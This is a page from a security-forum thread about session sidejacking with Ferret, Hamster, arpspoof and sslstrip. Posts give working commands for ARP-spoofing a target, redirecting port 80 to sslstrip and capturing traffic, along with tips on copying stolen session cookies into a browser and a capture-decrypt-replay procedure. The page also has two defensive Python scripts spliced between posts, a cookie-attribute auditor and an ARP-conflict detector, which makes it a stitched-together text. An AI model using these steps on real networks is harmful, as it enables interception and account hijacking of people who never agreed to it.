Page 2 of 2
Results 11 to 16 of 16

Thread: [Video] Session Sidejacking (Ferret and Hamster)

  1. #11
    virusss (Just burned his ISO)
    Join Date: Oct 2007
    Posts: 15

    Re: [Video] Session Sidejacking (Ferret and Hamster)

    Works like a charm...


    Just a few things to mention for further reference:

    It works mostly on home networks or very poorly configured business networks, so don't expect to easily spoof any network (especially where a Cisco layer 3 switch is involved).

    You can also edit session cookies in your browser, so if it's asking you to log in and you used sslstrip, try to look for valid cookies. In my case sslstrip didn't start, but I was able to manually copy some cookies and replace them in my browser (use an addon for Firefox or Opera which has a cookie editor).
    I tried it on https://mail.yahoo.com and it worked just fine.... plus some other sites on http.

    Good Luck!
    A clever person solves a problem. A wise person avoids it.
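The post above turns on the defender's side of sidejacking: a session cookie that the browser is willing to send over plain HTTP is exactly what a sniffer picks up, and the Secure, HttpOnly and SameSite attributes are the server-side controls that close that gap. The script below is an added example written for this thread; it is not code from the thread, from Hamster/Ferret or from sslstrip, and every Set-Cookie value in it is constructed rather than captured from any real site. It parses Set-Cookie header values and reports which of those attributes are missing, rating the finding higher when the cookie name looks like a session or login token.

```python
"""Audit Set-Cookie headers for the attributes that make sidejacking harder.

Added example for this thread (not code from the thread, from Hamster/Ferret
or from sslstrip). All header values below are constructed, not captured from
any real site.
"""
from typing import Dict, List

# Constructed Set-Cookie values, as a proxy or test harness might record them.
SAMPLE_HEADERS = [
    "SESSIONID=abc123; Path=/",                                  # sniffable and script-readable
    "SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax",  # hardened form of the same cookie
    "theme=dark; Path=/; Max-Age=31536000",                      # preference cookie, low value to an attacker
]

# Name fragments that suggest a cookie carries session or login state (heuristic).
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")


def parse_set_cookie(header_value: str) -> Dict[str, object]:
    """Split one Set-Cookie value into name, value and a lower-cased attribute map.

    Flag attributes (Secure, HttpOnly) map to True; valued ones keep their value.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for attr in parts[1:]:
        if not attr:
            continue
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_set_cookie(header_value: str) -> Dict[str, object]:
    """Return the cookie name, a severity and the list of missing protections.

    no-secure:   the browser also sends the cookie over plain HTTP, which is what
                 a sniffer (or an sslstrip-downgraded page) relies on.
    no-httponly: page script can read the cookie, so an XSS bug leaks it as well.
    no-samesite: the cookie rides along on cross-site requests.
    """
    cookie = parse_set_cookie(header_value)
    attrs = cookie["attrs"]
    findings: List[str] = []
    if "secure" not in attrs:
        findings.append("no-secure")
    if "httponly" not in attrs:
        findings.append("no-httponly")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append("no-samesite")
    session_like = any(h in str(cookie["name"]).lower() for h in SESSION_NAME_HINTS)
    if not findings:
        severity = "ok"
    elif session_like:
        severity = "high"
    else:
        severity = "low"
    return {"name": cookie["name"], "severity": severity, "findings": findings}


def audit_all(headers: List[str]) -> List[Dict[str, object]]:
    """Audit a list of Set-Cookie values, e.g. all of them from one captured response."""
    return [audit_set_cookie(h) for h in headers]


if __name__ == "__main__":
    for result in audit_all(SAMPLE_HEADERS):
        print(f"{result['name']:<10} {result['severity']:<5} {', '.join(result['findings']) or '-'}")
```

Run it against the Set-Cookie lines of your own application's login response; a "high" result on the session cookie means the session is exposed to exactly the copy-the-cookie trick described in the post, independent of which sniffing tool is used.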

  2. #12
    g0tmi1k (Moderator)
    Join Date: Feb 2010
    Posts: 1,771

    Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by kenv202:
    Hi, sorry for the late reply. I am using the persistent live CD BT4 Final; I have updated everything recently using the apt-get command.

    I fixed the LLC error by changing to my Alfa card rather than using my internal wireless card.

    here is my log:
    1st window:
    echo 1 > /proc/sys/net/ipv4/ip_forward

    root@bt:~# arpspoof -i wlan1 -t 192.168.1.107 192.168.1.117
    0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34
    0:c0:ca:37:a8:34 0:0:0:0:0:0 0806 42: arp reply 192.168.1.117 is-at 0:c0:ca:37:a8:34

    2nd window:
    root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    root@bt:~# sslstrip -p -k -f

    sslstrip 0.6 by Moxie Marlinspike running...

    3rd window: (this is where it starts going wrong, I think)
    -- Sniffing on interface "wlan1"
    SNIFFING: wlan1
    LINKTYPE: 1 Ethernet
    ID-IP=[192.168.1.117], macaddr=[00:c0:ca:37:a8:34]
    ID-MAC=[00:c0:ca:37:a8:34], ip=[192.168.1.117]
    Traffic seen
    ID-IP=[192.168.1.107], macaddr=[00:23:6c:89:04:73]
    ID-MAC=[00:23:6c:89:04:73], ip=[192.168.1.107]
    ID-IP=[192.168.1.1], Device="UPnP", LOCATION="http://192.168.1.1:5000/rootDesc.xml"
    ID-IP=[192.168.1.1], Device="UPnP", SOFTWARE="Tomato UPnP/1.0 MiniUPnPd/1.4"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="upnp:rootdevice"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:InternetGatewayDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANConnectionDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:device:WANDevice:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANIPConnection:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:WANPPPConnection:1"
    ID-IP=[192.168.1.1], Device="UPnP", SERVICE="urn:schemas-upnp-org:service:Layer3Forwarding:1"
    ID-IP=[192.168.1.1], macaddr=[00:1c:10:11:bc:17]
    ID-MAC=[00:1c:10:11:bc:17], ip=[192.168.1.1]
    proto="DNS", query="A", ip.src=[192.168.1.117], name="rcv-srv22.inplay.tubemogul.com"
    ID-DNS="rcv-srv22.inplay.tubemogul.com", address=[174.129.26.97]
    ID-IP=[192.168.1.117], User-Agent="Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)"
    proto="HTTP", op="GET", Host="rcv-srv22.inplay.tubemogul.com", URL="/StreamReceiver/services"

    4th window :

    root@bt:~# /pentest/sniffers/hamster/hamster
    --- HAMPSTER 2.0 side-jacking tool ---
    begining thread
    Set browser to use proxy BackTrack Linux
    DEBUG: set_ports_option(1234)
    DEBUG: mg_open_listening_port(1234)
    Proxy: listening on 127.0.0.1:1234
    GET /StreamReceiver/services
    GET /StreamReceiver/services HTTP/1.1
    User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.10 (like Gecko) (Debian)
    Accept: text/html, image/jpeg, image/png, text/*, image/*, */*
    Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
    Accept-Language: en
    Host: rcv-srv22.inplay.tubemogul.com
    Connection: close
    Referer: http://static.inplay.tubemogul.com/c...erID=B-4SJ-WF8

    recv failed: Connection reset by peer
    recv failed: Connection reset by peer

    I have no idea why it says recv failed: Connection reset by peer...

    Basically, once I got hamster up and running, I proceeded to use my 2nd laptop, which runs Windows 7; I used Firefox to log into my Gmail account, then refreshed Konqueror on my BT4 machine but didn't see the log for that computer in Konqueror.
    (Yes, both of my computers are connected to the same network.)

    Hope you can help =)

    Try without SSLStrip?

    Quote Originally Posted by virusss:
    Works like a charm...


    Just a few things to mention for further reference:

    It works mostly on home networks or very poorly configured business networks, so don't expect to easily spoof any network (especially where a Cisco layer 3 switch is involved).

    You can also edit session cookies in your browser, so if it's asking you to log in and you used sslstrip, try to look for valid cookies. In my case sslstrip didn't start, but I was able to manually copy some cookies and replace them in my browser (use an addon for Firefox or Opera which has a cookie editor).
    I tried it on https://mail.yahoo.com and it worked just fine.... plus some other sites on http.

    Good Luck!

    Thanks for the tip!
    Have you...g0tmi1k?

  3. #13
    pen2paper (Just burned his ISO)
    Join Date: Aug 2010
    Posts: 5

    Re: [Video] Session Sidejacking (Ferret and Hamster)

    Could someone please help me? I have successfully cracked my WPA key using your method, g0tmi1k, thanks a lot, so I'm guessing my monitoring/injection is working.

    I am testing this on XP SP2 with no AV or firewall enabled, with BT4 Final.

    I am using wlan0; does monitor mode have to be enabled? Also, do I need to be connected to the same router as my XP machine?

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

    Are 192.168.1.104 and 192.168.1.1 the IP address and default gateway of the XP machine? If so, which one comes first, or doesn't it matter? Also, wouldn't I do arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1 ?

    After following this command

    sslstrip -p -k -f

    I do not receive the message "sslstrip 0.6 by Moxie Marlinspike running..."

    Please help.

  4. #14
    siviog1 (Just burned his ISO)
    Join Date: Aug 2010
    Posts: 4

    Re: [Video] Session Sidejacking (Ferret and Hamster)

    Tested this using BTr1 on a netbook connected to the network via wlan0 - host PC was Win7 - worked like a charm.

  5. #15
    g0tmi1k (Moderator)
    Join Date: Feb 2010
    Posts: 1,771

    Re: [Video] Session Sidejacking (Ferret and Hamster)

    Quote Originally Posted by pen2paper:
    Could someone please help me? I have successfully cracked my WPA key using your method, g0tmi1k, thanks a lot, so I'm guessing my monitoring/injection is working.

    I am testing this on XP SP2 with no AV or firewall enabled, with BT4 Final.

    I am using wlan0; does monitor mode have to be enabled? Also, do I need to be connected to the same router as my XP machine?

    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 -t 192.168.1.104 192.168.1.1

    Are 192.168.1.104 and 192.168.1.1 the IP address and default gateway of the XP machine? If so, which one comes first, or doesn't it matter? Also, wouldn't I do arpspoof -i wlan0 -t 192.168.1.104 192.168.1.1 ?

    After following this command

    sslstrip -p -k -f

    I do not receive the message "sslstrip 0.6 by Moxie Marlinspike running..."

    Please help.

    Try this:

    1. Capture the traffic via airodump.
    2. Decrypt via airdecap
    3. Use ferret (with the -r [filename])
    4. Use hamster

    By doing it that way, you don't have to be connected to the access point (because you're in monitor mode). Therefore you don't have to worry about which interfaces to use, or about doing an ARP attack (using arpspoof).

    That's odd about sslstrip - try:
    Code:
    whereis sslstrip
    sslstrip -h
    The first command makes sure it is installed.
    The second command should display the "help" text.

    In reply to your arpspoof question:

    • The -t bit - you're selecting your target. You want to put your target's IP address there.
    • The next IP address is the IP address you're spoofing (in this case the gateway).
    • arpspoof, I believe, is only doing it one way, e.g. tricking the target that you're the gateway, NOT the gateway that you're the target.
    • And yes, if wlan0 is the interface you're connected to the network with, you need to use that.


    Quote Originally Posted by siviog1:
    Tested this using BTr1 on a netbook connected to the network via wlan0 - host PC was Win7 - worked like a charm.

    Thanks for the feedback. Good to know it still works. (=
    Have you...g0tmi1k?
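The arpspoof explanation above (the -t target is told that the attacker's MAC is the gateway) also describes what a defender can look for: on the wire, ARP cache poisoning shows up as the gateway's IP address being announced from a MAC address other than the router's own. The script below is an added example written for this thread; it is not code from the thread, from arpspoof or from ferret. It reads the "arp reply <ip> is-at <mac>" text that tcpdump and arpspoof print (the same line format seen in the log earlier in this page), normalises the short and zero-padded MAC spellings that appear in that output, and reports every IP claimed by more than one MAC. The trusted-binding table and the sample lines are constructed for the example; seeding the table with the router's known MAC means a single rogue reply is enough to raise an alert. On a managed network the equivalent control is the switch's dynamic ARP inspection or a static ARP entry for the gateway on sensitive hosts.

```python
"""Flag ARP replies that claim one IP address for more than one MAC address.

Added example for this thread (not code from the thread or from arpspoof/ferret).
It reads the "arp reply <ip> is-at <mac>" text that tcpdump and arpspoof print;
the trusted bindings and sample lines below are constructed for the example.
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple

ARP_REPLY = re.compile(
    r"arp reply (\d{1,3}(?:\.\d{1,3}){3}) is-at ([0-9A-Fa-f]{1,2}(?::[0-9A-Fa-f]{1,2}){5})"
)

# Constructed: the gateway's genuine binding, as a defender would record it
# from a known-good moment or from the router's own configuration.
TRUSTED_BINDINGS = {"192.168.1.1": "00:1c:10:11:bc:17"}

# Constructed sample in tcpdump/arpspoof short-MAC style. The last two lines
# re-announce the gateway address from a different station's MAC, which is
# what ARP cache poisoning looks like on the wire.
SAMPLE_LINES = [
    "0:1c:10:11:bc:17 0:23:6c:89:4:73 0806 42: arp reply 192.168.1.1 is-at 0:1c:10:11:bc:17",
    "0:23:6c:89:4:73 0:1c:10:11:bc:17 0806 42: arp reply 192.168.1.107 is-at 0:23:6c:89:4:73",
    "Traffic seen",
    "0:c0:ca:37:a8:34 0:23:6c:89:4:73 0806 42: arp reply 192.168.1.1 is-at 0:c0:ca:37:a8:34",
    "0:c0:ca:37:a8:34 0:23:6c:89:4:73 0806 42: arp reply 192.168.1.1 is-at 0:c0:ca:37:a8:34",
]


def normalize_mac(mac: str) -> str:
    """Zero-pad each octet so "0:c0:ca:37:a8:34" and "00:c0:ca:37:a8:34" compare equal."""
    return ":".join(octet.lower().zfill(2) for octet in mac.split(":"))


def parse_arp_reply(line: str) -> Optional[Tuple[str, str]]:
    """Return (ip, normalized_mac) for an ARP reply line, or None for anything else."""
    match = ARP_REPLY.search(line)
    if not match:
        return None
    return match.group(1), normalize_mac(match.group(2))


def find_conflicts(lines: List[str],
                   trusted: Optional[Dict[str, str]] = None) -> Dict[str, Set[str]]:
    """Map each IP to every MAC that claimed it and keep only IPs with more than one claimant.

    Seeding with trusted bindings means one rogue reply for the gateway is enough to
    alert, instead of waiting until both the genuine and the rogue reply were seen.
    """
    claims: Dict[str, Set[str]] = defaultdict(set)
    for ip, mac in (trusted or {}).items():
        claims[ip].add(normalize_mac(mac))
    for line in lines:
        parsed = parse_arp_reply(line)
        if parsed:
            claims[parsed[0]].add(parsed[1])
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


if __name__ == "__main__":
    for ip, macs in find_conflicts(SAMPLE_LINES, TRUSTED_BINDINGS).items():
        print(f"ALERT: {ip} claimed by {len(macs)} MACs: {', '.join(sorted(macs))}")
```

Feed it the output of a tcpdump filter for ARP replies on the segment you want to watch; the only state it needs is the gateway's real MAC, which is also the value to pin with a static ARP entry on hosts that must not be redirected.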

  6. #16
    Just burned his ISO
    Join Date: Jul 2010
    Location: China
    Posts: 2

    Re: [Video] Session Sidejacking (Ferret and Hamster)

    Thanks for your video. I am happy to watch it! Hope for more videos!
